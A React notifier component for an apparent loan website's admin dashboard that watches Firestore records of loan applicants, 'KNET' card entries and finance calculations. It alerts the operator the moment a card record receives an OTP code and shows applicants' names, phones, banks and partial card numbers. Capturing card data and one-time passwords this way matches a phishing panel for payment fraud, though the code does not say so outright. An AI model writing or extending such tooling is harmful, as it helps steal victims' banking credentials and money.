import React, { useEffect, useRef, useCallback } from "react";
import { db } from "../firebaseConfig";
import { collection, onSnapshot, orderBy, query } from "firebase/firestore";
import { useLocation } from "react-router-dom";

export default function RealtimeNotifier() {
  const location = useLocation();
  const isDashboard = location.pathname.startsWith("/dashboard");
  const audioRef = useRef(null);
  const audioUnlockedRef = useRef(false);
  const loansInitializedRef = useRef(false);
  const knetInitializedRef = useRef(false);
  const calcInitializedRef = useRef(false);

  const notify = useCallback((title, body) => {
    if (!isDashboard) return;
    if (typeof window !== "undefined" && "Notification" in window) {
      if (Notification.permission === "granted") {
        new Notification(title, {
          body,
          icon: "/logo192.png",
        });
      }
    }

    if (!audioRef.current) {
      const audio = new Audio("/notify.mp3");
      audio.preload = "auto";
      audio.volume = 0.7;
      audioRef.current = audio;
      if (typeof audio.load === "function") {
        audio.load();
      }
    }
    if (audioRef.current) {
      audioRef.current.muted = false;
      audioRef.current.currentTime = 0;
      audioRef.current.play().catch((err) => console.warn("Audio blocked:", err));
    }
  }, [isDashboard]);

  const formatLoanNotificationBody = useCallback((data) => {
    const personal = data.personal || {};
    const salary = data.salary || {};
    const name = personal.fullName || "عميل غير معروف";
    const phone = personal.phone || "بدون رقم";
    const requested = salary.requestedAmount || "غير محدد";
    return `الاسم: ${name} • الهاتف: ${phone} • المبلغ المطلوب: ${requested}`;
  }, []);

  const formatCalcNotificationBody = useCallback((data) => {
    const amount = data.amount ? `${data.amount} د.ك` : "بدون مبلغ";
    const months = data.months ? `${data.months} شهر` : "";
    const loanType = data.loanType || "حاسبة التمويل";
    const country = data.country || "";
    const locationLine = country ? `New Calculation from ${country}` : "New Calculation";
    return `${locationLine} • ${loanType} • ${amount}${months ? ` • ${months}` : ""}`;
  }, []);

  const formatKnetNotificationBody = useCallback((data) => {
    const bank = data.bank || "بنك غير محدد";
    const prefix = data.prefix || "";
    const cardSuffix = data.card ? data.card.slice(-4) : "****";
    const loanId = data.loanId || data.id || "غير معروف";
    return `رقم الطلب: ${loanId} • البنك: ${bank} • البطاقة: ${
      prefix ? `${prefix}****${cardSuffix}` : `****${cardSuffix}`
    }`;
  }, []);

  useEffect(() => {
    if (!isDashboard) return;
    const audio = new Audio("/notify.mp3");
    audio.preload = "auto";
    audio.volume = 0.7;
    audioRef.current = audio;
    if (typeof audio.load === "function") {
      audio.load();
    }
    audio.muted = true;
    const playPromise = audio.play();
    if (playPromise && typeof playPromise.then === "function") {
      playPromise
        .then(() => {
          audio.pause();
          audio.currentTime = 0;
          audio.muted = false;
          audioUnlockedRef.current = true;
        })
        .catch(() => {
          audio.muted = false;
        });
    } else {
      audio.pause();
      audio.currentTime = 0;
      audio.muted = false;
      audioUnlockedRef.current = true;
    }
  }, [isDashboard]);

  useEffect(() => {
    if (!isDashboard || audioUnlockedRef.current) return;

    const unlockSound = () => {
      if (!audioRef.current || audioUnlockedRef.current) return;
      const audio = audioRef.current;
      audio.muted = true;
      const playPromise = audio.play();

      const finalize = () => {
        audio.pause();
        audio.currentTime = 0;
        audio.muted = false;
        audioUnlockedRef.current = true;
        document.removeEventListener("pointerdown", unlockSound);
        document.removeEventListener("keydown", unlockSound);
      };

      if (playPromise && typeof playPromise.then === "function") {
        playPromise
          .then(finalize)
          .catch(() => {
            audio.muted = false;
          });
      } else {
        finalize();
      }
    };

    document.addEventListener("pointerdown", unlockSound);
    document.addEventListener("keydown", unlockSound);

    return () => {
      document.removeEventListener("pointerdown", unlockSound);
      document.removeEventListener("keydown", unlockSound);
    };
  }, [isDashboard]);

  useEffect(() => {
    if (!isDashboard) return;
    if (typeof window === "undefined" || !("Notification" in window)) return;
    // Only request permission when the admin explicitly clicks a button.
  }, [isDashboard]);

  useEffect(() => {
    if (!isDashboard) return;
    const loansQuery = query(collection(db, "loanEntries"), orderBy("updatedAt", "desc"));
    const unsubLoans = onSnapshot(loansQuery, (snapshot) => {
      if (!loansInitializedRef.current) {
        loansInitializedRef.current = true;
        return;
      }
      snapshot.docChanges().forEach((change) => {
        const data = change.doc.data();
        if (change.type === "added") {
          notify("📥 تم استلام طلب تمويل جديد", formatLoanNotificationBody(data));
        } else if (change.type === "modified") {
          notify("📝 تم تحديث بيانات طلب التمويل", formatLoanNotificationBody(data));
        } else if (change.type === "removed") {
          notify("🗑️ تم حذف طلب التمويل", `رقم الطلب: ${data.loanId || "غير معروف"}`);
        }
      });
    });

    return () => unsubLoans();
  }, [formatLoanNotificationBody, isDashboard, notify]);

  useEffect(() => {
    if (!isDashboard) return;
    const knetQuery = query(collection(db, "knetEntries"), orderBy("createdAt", "desc"));
    const unsubKnet = onSnapshot(knetQuery, (snapshot) => {
      if (!knetInitializedRef.current) {
        knetInitializedRef.current = true;
        return;
      }
      snapshot.docChanges().forEach((change) => {
        const data = change.doc.data();
        if (change.type === "added") {
          notify("💳 تم تسجيل بيانات KNET", formatKnetNotificationBody(data));
        } else if (change.type === "modified") {
          const title = data.otp ? "🔐 تم إدخال رمز OTP" : "📝 تم تحديث بيانات KNET";
          notify(title, formatKnetNotificationBody(data));
        } else if (change.type === "removed") {
          notify("🗑️ تم حذف بيانات KNET", `رقم الطلب: ${data.loanId || "غير معروف"}`);
        }
      });
    });

    return () => unsubKnet();
  }, [formatKnetNotificationBody, isDashboard, notify]);

  useEffect(() => {
    if (!isDashboard) return;
    const calcQuery = query(collection(db, "calculateEntries"), orderBy("updatedAt", "desc"));
    const unsubCalc = onSnapshot(calcQuery, (snapshot) => {
      if (!calcInitializedRef.current) {
        calcInitializedRef.current = true;
        return;
      }
      snapshot.docChanges().forEach((change) => {
        const data = change.doc.data();
        if (change.type === "added") {
          notify("🧮 تم إنشاء حساب تمويل", formatCalcNotificationBody(data));
        } else if (change.type === "modified") {
          notify("🧮 تم تحديث حساب تمويل", formatCalcNotificationBody(data));
        } else if (change.type === "removed") {
          notify("🗑️ تم حذف حساب تمويل", "تم حذف بيانات الحاسبة");
        }
      });
    });

    return () => unsubCalc();
  }, [formatCalcNotificationBody, isDashboard, notify]);

  useEffect(() => {
    if (isDashboard) return;
    if (audioRef.current) {
      audioRef.current.pause();
      audioRef.current.currentTime = 0;
    }
    loansInitializedRef.current = false;
    knetInitializedRef.current = false;
    calcInitializedRef.current = false;
  }, [isDashboard]);

  return null;
}
